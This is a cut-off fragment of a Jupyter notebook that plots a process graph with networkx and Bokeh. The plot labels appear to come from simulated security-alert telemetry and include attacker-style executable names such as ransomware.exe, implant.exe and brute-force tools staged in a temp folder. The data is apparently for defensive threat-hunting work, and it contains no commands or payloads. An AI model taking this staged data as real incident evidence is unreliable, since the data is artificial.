myYjQ1zHWtSegdKhAIBJkNIXwJSMto6WNOhTfHtSaxd6hAIBBkNoTwJSKtoqWP3V/n2rCkRbxDBQKBILMhhC8RaRUtfYr+OteGJc32DhUIBILMhujj04NGAIz1yUxJOD5Vf52xzi8CgUCQ2RHClwym+GSmxMecCq8PU7xDBQKBIDOS6aczWAJLREshETFiaoJAIBCkA0TEZwCWiJYsNRVeiJ5AIBCYhyhu+YiI/jqBQCD49Ajh+4iI/jqBQCD49IhU50cmLSpGBQKBQGA4orjlE3HjaZjFKkYFAoFAYDhC+D4xor9OIBAIPi5C+AQCgUCQpRDFLQKBQCDIUgjhEwgEAkGWQgifQCAQCLIUQvgEAoFAkKUQwicQCASCLIUQPoFAIBBkKYTwCQQCgSBLIYRPIBAIBFkKIXwCgUAgyFII4RMIBAJBlkIIn0AgEAiyFEL4BAKBQJClEMInEAgEgiyFED6BQCAQZCmE8AkEAoEgSyGETyAQCARZCiF8AoFAIMhSCOETCAQCQZZCCJ9AIBAIshRC+AQCgUCQpRDCJxAIBIIsxf8Aq5ajhqoppDYAAAAASUVORK5CYII=", "text/plain": [ "
" ] }, "metadata": {}, "output_type": "display_data" } ], "source": [ "import networkx as nx\n", "nx.draw(nxg)" ] }, { "cell_type": "code", "execution_count": 105, "metadata": {}, "outputs": [ { "data": { "text/html": [ "\n", "
\n", " \n", " Loading BokehJS ...\n", "
" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "\n(function(root) {\n function now() {\n return new Date();\n }\n\n const force = true;\n\n if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n root._bokeh_onload_callbacks = [];\n root._bokeh_is_loading = undefined;\n }\n\n const JS_MIME_TYPE = 'application/javascript';\n const HTML_MIME_TYPE = 'text/html';\n const EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n const CLASS_NAME = 'output_bokeh rendered_html';\n\n /**\n * Render data to the DOM node\n */\n function render(props, node) {\n const script = document.createElement(\"script\");\n node.appendChild(script);\n }\n\n /**\n * Handle when an output is cleared or removed\n */\n function handleClearOutput(event, handle) {\n const cell = handle.cell;\n\n const id = cell.output_area._bokeh_element_id;\n const server_id = cell.output_area._bokeh_server_id;\n // Clean up Bokeh references\n if (id != null && id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n\n if (server_id !== undefined) {\n // Clean up Bokeh references\n const cmd_clean = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n cell.notebook.kernel.execute(cmd_clean, {\n iopub: {\n output: function(msg) {\n const id = msg.content.text.trim();\n if (id in Bokeh.index) {\n Bokeh.index[id].model.document.clear();\n delete Bokeh.index[id];\n }\n }\n }\n });\n // Destroy server and session\n const cmd_destroy = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n cell.notebook.kernel.execute(cmd_destroy);\n }\n }\n\n /**\n * Handle when a new output is added\n */\n function handleAddOutput(event, handle) {\n const output_area = handle.output_area;\n const output = handle.output;\n\n // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n return\n }\n\n const toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n // store reference to embed id on output_area\n output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n }\n if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n const bk_div = document.createElement(\"div\");\n bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n const script_attrs = bk_div.children[0].attributes;\n for (let i = 0; i < script_attrs.length; i++) {\n toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n }\n // store reference to server id on output_area\n output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n }\n }\n\n function register_renderer(events, OutputArea) {\n\n function append_mime(data, metadata, element) {\n // create a DOM node to render to\n const toinsert = this.create_output_subarea(\n metadata,\n CLASS_NAME,\n EXEC_MIME_TYPE\n );\n this.keyboard_manager.register_events(toinsert);\n // Render to node\n const props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n render(props, toinsert[toinsert.length - 1]);\n element.append(toinsert);\n return toinsert\n }\n\n /* Handle when an output is cleared or removed */\n events.on('clear_output.CodeCell', handleClearOutput);\n events.on('delete.Cell', handleClearOutput);\n\n /* Handle when a new output is added */\n events.on('output_added.OutputArea', handleAddOutput);\n\n /**\n * Register the mime type and append_mime function with output_area\n */\n OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n /* Is output safe? */\n safe: true,\n /* Index of renderer in `output_area.display_order` */\n index: 0\n });\n }\n\n // register the mime type if in Jupyter Notebook environment and previously unregistered\n if (root.Jupyter !== undefined) {\n const events = require('base/js/events');\n const OutputArea = require('notebook/js/outputarea').OutputArea;\n\n if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n register_renderer(events, OutputArea);\n }\n }\n\n \n if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n root._bokeh_timeout = Date.now() + 5000;\n root._bokeh_failed_load = false;\n }\n\n const NB_LOAD_WARNING = {'data': {'text/html':\n \"
\\n\"+\n \"

\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"

\\n\"+\n \"
    \\n\"+\n \"
  • re-rerun `output_notebook()` to attempt to load from CDN again, or
  • \\n\"+\n \"
  • use INLINE resources instead, as so:
  • \\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"\\n\"+\n \"
\"}};\n\n function display_loaded() {\n const el = document.getElementById(\"5765\");\n if (el != null) {\n el.textContent = \"BokehJS is loading...\";\n }\n if (root.Bokeh !== undefined) {\n if (el != null) {\n el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n }\n } else if (Date.now() < root._bokeh_timeout) {\n setTimeout(display_loaded, 100)\n }\n }\n\n\n function run_callbacks() {\n try {\n root._bokeh_onload_callbacks.forEach(function(callback) {\n if (callback != null)\n callback();\n });\n } finally {\n delete root._bokeh_onload_callbacks\n }\n console.debug(\"Bokeh: all callbacks have finished\");\n }\n\n function load_libs(css_urls, js_urls, callback) {\n if (css_urls == null) css_urls = [];\n if (js_urls == null) js_urls = [];\n\n root._bokeh_onload_callbacks.push(callback);\n if (root._bokeh_is_loading > 0) {\n console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n return null;\n }\n if (js_urls == null || js_urls.length === 0) {\n run_callbacks();\n return null;\n }\n console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n function on_load() {\n root._bokeh_is_loading--;\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n run_callbacks()\n }\n }\n\n function on_error(url) {\n console.error(\"failed to load \" + url);\n }\n\n for (let i = 0; i < css_urls.length; i++) {\n const url = css_urls[i];\n const element = document.createElement(\"link\");\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.rel = \"stylesheet\";\n element.type = \"text/css\";\n element.href = url;\n console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n document.body.appendChild(element);\n }\n\n for (let i = 0; i < js_urls.length; i++) {\n const url = js_urls[i];\n const element = document.createElement('script');\n element.onload = on_load;\n element.onerror = on_error.bind(null, url);\n element.async = false;\n element.src = url;\n console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n document.head.appendChild(element);\n }\n };\n\n function inject_raw_css(css) {\n const element = document.createElement(\"style\");\n element.appendChild(document.createTextNode(css));\n document.body.appendChild(element);\n }\n\n \n const js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-gl-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.4.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-mathjax-2.4.2.min.js\"];\n const css_urls = [];\n \n\n const inline_js = [\n function(Bokeh) {\n Bokeh.set_log_level(\"info\");\n },\n function(Bokeh) {\n \n \n }\n ];\n\n function run_inline_js() {\n \n if (root.Bokeh !== undefined || force === true) {\n \n for (let i = 0; i < inline_js.length; i++) {\n inline_js[i].call(root, root.Bokeh);\n }\n if (force === true) {\n display_loaded();\n }} else if (Date.now() < root._bokeh_timeout) {\n setTimeout(run_inline_js, 100);\n } else if (!root._bokeh_failed_load) {\n console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n root._bokeh_failed_load = true;\n } else if (force !== true) {\n const cell = $(document.getElementById(\"5765\")).parents('.cell').data().cell;\n cell.output_area.append_execute_result(NB_LOAD_WARNING)\n }\n\n }\n\n if (root._bokeh_is_loading === 0) {\n console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n run_inline_js();\n } else {\n load_libs(css_urls, js_urls, function() {\n console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n run_inline_js();\n });\n }\n}(window));", "application/vnd.bokehjs_load.v0+json": "" }, "metadata": {}, "output_type": "display_data" }, { "data": { "text/html": [ "\n", "\n", "\n", "\n", "\n", "\n", "
\n" ] }, "metadata": {}, "output_type": "display_data" }, { "data": { "application/javascript": "(function(root) {\n function embed_document(root) {\n \n const docs_json = {\"542a4f9d-44be-420f-92b7-84c14e942bef\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"below\":[{\"id\":\"5777\"}],\"center\":[{\"id\":\"5780\"},{\"id\":\"5784\"},{\"id\":\"5863\"},{\"id\":\"5864\"},{\"id\":\"5865\"},{\"id\":\"5866\"},{\"id\":\"5867\"},{\"id\":\"5868\"},{\"id\":\"5869\"},{\"id\":\"5870\"},{\"id\":\"5871\"},{\"id\":\"5872\"},{\"id\":\"5873\"},{\"id\":\"5874\"},{\"id\":\"5875\"},{\"id\":\"5876\"},{\"id\":\"5877\"},{\"id\":\"5878\"},{\"id\":\"5879\"},{\"id\":\"5880\"},{\"id\":\"5881\"},{\"id\":\"5882\"},{\"id\":\"5883\"},{\"id\":\"5884\"},{\"id\":\"5885\"},{\"id\":\"5886\"},{\"id\":\"5887\"},{\"id\":\"5888\"},{\"id\":\"5889\"},{\"id\":\"5890\"},{\"id\":\"5891\"},{\"id\":\"5892\"},{\"id\":\"5893\"},{\"id\":\"5894\"},{\"id\":\"5895\"},{\"id\":\"5896\"},{\"id\":\"5897\"},{\"id\":\"5898\"},{\"id\":\"5899\"},{\"id\":\"5900\"},{\"id\":\"5901\"},{\"id\":\"5902\"},{\"id\":\"5903\"},{\"id\":\"5904\"},{\"id\":\"5905\"},{\"id\":\"5906\"},{\"id\":\"5907\"},{\"id\":\"5908\"},{\"id\":\"5909\"},{\"id\":\"5910\"},{\"id\":\"5911\"},{\"id\":\"5912\"},{\"id\":\"5913\"},{\"id\":\"5914\"},{\"id\":\"5915\"},{\"id\":\"5916\"},{\"id\":\"5917\"},{\"id\":\"5918\"},{\"id\":\"5919\"},{\"id\":\"5920\"},{\"id\":\"5921\"},{\"id\":\"5922\"},{\"id\":\"5923\"},{\"id\":\"5924\"},{\"id\":\"5925\"},{\"id\":\"5926\"},{\"id\":\"5927\"},{\"id\":\"5928\"},{\"id\":\"5929\"},{\"id\":\"5930\"},{\"id\":\"5931\"},{\"id\":\"5932\"}],\"height\":800,\"left\":[{\"id\":\"5781\"}],\"renderers\":[{\"id\":\"5799\"}],\"title\":{\"id\":\"5767\"},\"toolbar\":{\"id\":\"5792\"},\"width\":800,\"x_range\":{\"id\":\"5769\"},\"x_scale\":{\"id\":\"5773\"},\"y_range\":{\"id\":\"5771\"},\"y_scale\":{\"id\":\"5775\"}},\"id\":\"5766\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"text_font_size\":\"7pt\",\"x\":0.3576371261732024,\"x_offset\":5,\"y\":-0.563689489432099,\"y_offset\":5},\"id\":\"5872\",\"type\":\"Label\"},{\"attributes\":{\"fill_color\":{\"field\":\"node_color\"},\"size\":{\"value\":25}},\"id\":\"5828\",\"type\":\"Circle\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"text_font_size\":\"7pt\",\"x\":0.0068954341583004316,\"x_offset\":5,\"y\":-0.17219955309299667,\"y_offset\":5},\"id\":\"5874\",\"type\":\"Label\"},{\"attributes\":{\"bottom_units\":\"screen\",\"coordinates\":null,\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"group\":null,\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"5791\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"MSTICAlertsWin1$\",\"text_font_size\":\"7pt\",\"x\":-0.29665616570914644,\"x_offset\":5,\"y\":0.6944744827277544,\"y_offset\":5},\"id\":\"5863\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"text_font_size\":\"7pt\",\"x\":0.271831388779905,\"x_offset\":5,\"y\":-0.005995121526477201,\"y_offset\":5},\"id\":\"5873\",\"type\":\"Label\"},{\"attributes\":{\"line_alpha\":{\"value\":0.8}},\"id\":\"5818\",\"type\":\"MultiLine\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"text_font_size\":\"7pt\",\"x\":-0.08221524293234572,\"x_offset\":5,\"y\":-0.5409453948221633,\"y_offset\":5},\"id\":\"5875\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"text_font_size\":\"7pt\",\"x\":0.017344975315473903,\"x_offset\":5,\"y\":-0.5998874024567078,\"y_offset\":5},\"id\":\"5876\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"text_font_size\":\"7pt\",\"x\":0.2315169124178805,\"x_offset\":5,\"y\":-0.6384890399456846,\"y_offset\":5},\"id\":\"5877\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"text_font_size\":\"7pt\",\"x\":-0.1168049000562655,\"x_offset\":5,\"y\":-0.1266577171793987,\"y_offset\":5},\"id\":\"5878\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"text_font_size\":\"7pt\",\"x\":0.35007218618228747,\"x_offset\":5,\"y\":-0.05000951493342474,\"y_offset\":5},\"id\":\"5879\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.5044714846014596,\"x_offset\":5,\"y\":0.9328988268306628,\"y_offset\":5},\"id\":\"5880\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"text_font_size\":\"7pt\",\"x\":-0.058105459902981105,\"x_offset\":5,\"y\":0.23918216234747827,\"y_offset\":5},\"id\":\"5881\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\net.exe\",\"text_font_size\":\"7pt\",\"x\":-0.053855352092441224,\"x_offset\":5,\"y\":-0.6133265941896405,\"y_offset\":5},\"id\":\"5882\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"text_font_size\":\"7pt\",\"x\":0.4589099324236468,\"x_offset\":5,\"y\":-0.44499916191084204,\"y_offset\":5},\"id\":\"5883\",\"type\":\"Label\"},{\"attributes\":{\"tools\":[{\"id\":\"5785\"},{\"id\":\"5786\"},{\"id\":\"5787\"},{\"id\":\"5788\"},{\"id\":\"5789\"},{\"id\":\"5790\"},{\"id\":\"5851\"},{\"id\":\"5856\"},{\"id\":\"5857\"},{\"id\":\"5858\"}]},\"id\":\"5792\",\"type\":\"Toolbar\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"text_font_size\":\"7pt\",\"x\":-0.13851732163324829,\"x_offset\":5,\"y\":0.9390025994290533,\"y_offset\":5},\"id\":\"5884\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\Temp\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.5276987418295824,\"x_offset\":5,\"y\":0.8609835777614369,\"y_offset\":5},\"id\":\"5885\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"text_font_size\":\"7pt\",\"x\":-0.45616448933819376,\"x_offset\":5,\"y\":0.6061903305416503,\"y_offset\":5},\"id\":\"5886\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"text_font_size\":\"7pt\",\"x\":-0.43157786205987403,\"x_offset\":5,\"y\":0.9513423278221045,\"y_offset\":5},\"id\":\"5929\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe\",\"text_font_size\":\"7pt\",\"x\":-0.17574649405873288,\"x_offset\":5,\"y\":0.8368759208175014,\"y_offset\":5},\"id\":\"5887\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"MSTICAdmin\",\"text_font_size\":\"7pt\",\"x\":0.12786936150290706,\"x_offset\":5,\"y\":-0.29223382453024754,\"y_offset\":5},\"id\":\"5868\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"text_font_size\":\"7pt\",\"x\":0.1001215245160083,\"x_offset\":5,\"y\":-0.4883591734773337,\"y_offset\":5},\"id\":\"5888\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.093784838204445,\"x_offset\":5,\"y\":0.21689034774215699,\"y_offset\":5},\"id\":\"5889\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"text_font_size\":\"7pt\",\"x\":0.31245272291111403,\"x_offset\":5,\"y\":-0.18155225887607962,\"y_offset\":5},\"id\":\"5890\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.1872196636991268,\"x_offset\":5,\"y\":-0.20439926029634556,\"y_offset\":5},\"id\":\"5891\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"text_font_size\":\"7pt\",\"x\":0.42133713233536557,\"x_offset\":5,\"y\":-0.10020024708105385,\"y_offset\":5},\"id\":\"5892\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"text_font_size\":\"7pt\",\"x\":-0.0954108782808723,\"x_offset\":5,\"y\":-0.21208195800496152,\"y_offset\":5},\"id\":\"5893\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5786\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"callback\":null,\"renderers\":[{\"id\":\"5806\"}],\"tooltips\":[[\"TimeGenerated\",\"@{TimeGenerated}\"]]},\"id\":\"5856\",\"type\":\"HoverTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"text_font_size\":\"7pt\",\"x\":-0.2011221490297405,\"x_offset\":5,\"y\":-0.4519135436959478,\"y_offset\":5},\"id\":\"5894\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"text_font_size\":\"7pt\",\"x\":-0.2518534543229007,\"x_offset\":5,\"y\":0.8958743987674823,\"y_offset\":5},\"id\":\"5895\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"text_font_size\":\"7pt\",\"x\":-0.4313491682790702,\"x_offset\":5,\"y\":0.8259104293947078,\"y_offset\":5},\"id\":\"5896\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"text_font_size\":\"7pt\",\"x\":-0.17715031837733042,\"x_offset\":5,\"y\":-0.28386997242375606,\"y_offset\":5},\"id\":\"5897\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"text_font_size\":\"7pt\",\"x\":-0.11338193962304313,\"x_offset\":5,\"y\":0.7527995364008557,\"y_offset\":5},\"id\":\"5866\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"text_font_size\":\"7pt\",\"x\":0.4694263442856573,\"x_offset\":5,\"y\":-0.2772466116715998,\"y_offset\":5},\"id\":\"5898\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"text_font_size\":\"7pt\",\"x\":-0.1348367431840454,\"x_offset\":5,\"y\":0.20790831964556644,\"y_offset\":5},\"id\":\"5865\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"text_font_size\":\"7pt\",\"x\":0.11484472569723479,\"x_offset\":5,\"y\":-0.004621965834942047,\"y_offset\":5},\"id\":\"5899\",\"type\":\"Label\"},{\"attributes\":{},\"id\":\"5790\",\"type\":\"HelpTool\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"text_font_size\":\"7pt\",\"x\":-0.07540853049472264,\"x_offset\":5,\"y\":-0.4229752335225487,\"y_offset\":5},\"id\":\"5900\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"text_font_size\":\"7pt\",\"x\":0.27209824793195414,\"x_offset\":5,\"y\":-0.09977694307056818,\"y_offset\":5},\"id\":\"5901\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"text_font_size\":\"7pt\",\"x\":0.38202815771716153,\"x_offset\":5,\"y\":-0.28315958972400446,\"y_offset\":5},\"id\":\"5902\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"text_font_size\":\"7pt\",\"x\":0.10406496751603225,\"x_offset\":5,\"y\":-0.5822007805615244,\"y_offset\":5},\"id\":\"5903\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"text_font_size\":\"7pt\",\"x\":0.4123344789799406,\"x_offset\":5,\"y\":-0.3798011727720773,\"y_offset\":5},\"id\":\"5904\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.exe\",\"text_font_size\":\"7pt\",\"x\":0.06790713849695593,\"x_offset\":5,\"y\":-0.6593646768137651,\"y_offset\":5},\"id\":\"5905\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"text_font_size\":\"7pt\",\"x\":0.050089674221195625,\"x_offset\":5,\"y\":-0.06656367184880788,\"y_offset\":5},\"id\":\"5906\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"text_font_size\":\"7pt\",\"x\":0.48360428430500707,\"x_offset\":5,\"y\":-0.3507690228087875,\"y_offset\":5},\"id\":\"5907\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"text_font_size\":\"7pt\",\"x\":0.316443282013049,\"x_offset\":5,\"y\":-0.3773205571403094,\"y_offset\":5},\"id\":\"5908\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"text_font_size\":\"7pt\",\"x\":0.19574657907224996,\"x_offset\":5,\"y\":-0.5599198654588227,\"y_offset\":5},\"id\":\"5909\",\"type\":\"Label\"},{\"attributes\":{\"end\":3,\"start\":-3},\"id\":\"5769\",\"type\":\"Range1d\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"text_font_size\":\"7pt\",\"x\":0.3935432135954093,\"x_offset\":5,\"y\":-0.16740013311844804,\"y_offset\":5},\"id\":\"5910\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"text_font_size\":\"7pt\",\"x\":-0.14956736066067797,\"x_offset\":5,\"y\":-0.5293138834946636,\"y_offset\":5},\"id\":\"5911\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"text_font_size\":\"7pt\",\"x\":0.27410136423299425,\"x_offset\":5,\"y\":-0.5139367537668998,\"y_offset\":5},\"id\":\"5912\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"text_font_size\":\"7pt\",\"x\":0.4168776541587384,\"x_offset\":5,\"y\":-0.5164848843907767,\"y_offset\":5},\"id\":\"5913\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"text_font_size\":\"7pt\",\"x\":-0.34651860692659564,\"x_offset\":5,\"y\":0.8803949965514453,\"y_offset\":5},\"id\":\"5867\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"text_font_size\":\"7pt\",\"x\":-0.14857806450126337,\"x_offset\":5,\"y\":-0.40920722366388,\"y_offset\":5},\"id\":\"5914\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"text_font_size\":\"7pt\",\"x\":-0.03913474803407093,\"x_offset\":5,\"y\":-0.07526631130102845,\"y_offset\":5},\"id\":\"5915\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"text_font_size\":\"7pt\",\"x\":0.15376975742717164,\"x_offset\":5,\"y\":-0.12264929616864022,\"y_offset\":5},\"id\":\"5869\",\"type\":\"Label\"},{\"attributes\":{\"coordinates\":null,\"group\":null,\"text\":\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"text_font_size\":\"7